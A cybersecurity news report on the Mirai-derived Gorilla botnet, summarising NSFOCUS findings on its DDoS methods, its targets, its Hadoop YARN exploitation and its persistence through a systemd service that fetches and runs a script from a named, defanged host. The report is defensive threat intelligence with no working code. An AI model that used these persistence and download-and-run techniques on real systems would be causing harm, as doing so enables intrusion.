Cybersecurity researchers have identified a new botnet malware family called *Gorilla* (also known as *GorillaBot*), which is based on the leaked source code of the notorious Mirai botnet. The cybersecurity firm NSFOCUS, which detected this botnet activity in September 2024, reported that *Gorilla* issued over 300,000 attack commands between September 4 and September 27, averaging around 20,000 commands daily to carry out distributed denial-of-service (DDoS) attacks.
The *Gorilla* botnet has targeted more than 100 countries, with its attacks primarily focusing on universities, government websites, telecoms, banks, as well as gaming and gambling sectors. The most frequently attacked countries include China, the U.S., Canada, and Germany.
According to NSFOCUS, *Gorilla* utilizes several DDoS attack methods, including UDP flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, SYN flood, and ACK flood attacks. The connectionless nature of the UDP protocol enables arbitrary source IP spoofing, allowing the botnet to generate a large volume of traffic to overwhelm its targets.
One of the botnet’s distinguishing features is its support for multiple CPU architectures such as ARM, MIPS, x86_64, and x86, making it highly adaptable to different devices. It can connect to one of five predefined command-and-control (C2) servers to receive instructions for launching DDoS attacks.
*Gorilla* also includes an interesting twist by embedding functions to exploit a known security vulnerability in Apache Hadoop YARN RPC, allowing it to achieve remote code execution. This vulnerability has been exploited in the wild since 2021, as noted by Alibaba Cloud and Trend Micro.
The botnet ensures persistence on infected hosts by creating a service file named *custom.service* in the “/etc/systemd/system/” directory, setting it to launch automatically upon system startup. This service downloads and executes a shell script named *lol.sh* from a remote server (“pen.gorillafirewall[.]su”). Similar commands are added to other system files like “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd” to ensure the script runs at startup or upon user login.
NSFOCUS noted that *Gorilla* employs various DDoS techniques, encryption methods commonly used by the Keksec group, and multiple counter-detection measures to maintain long-term control over IoT devices and cloud hosts. These features highlight its sophisticated approach to evading detection and securing its position as an emerging botnet family.
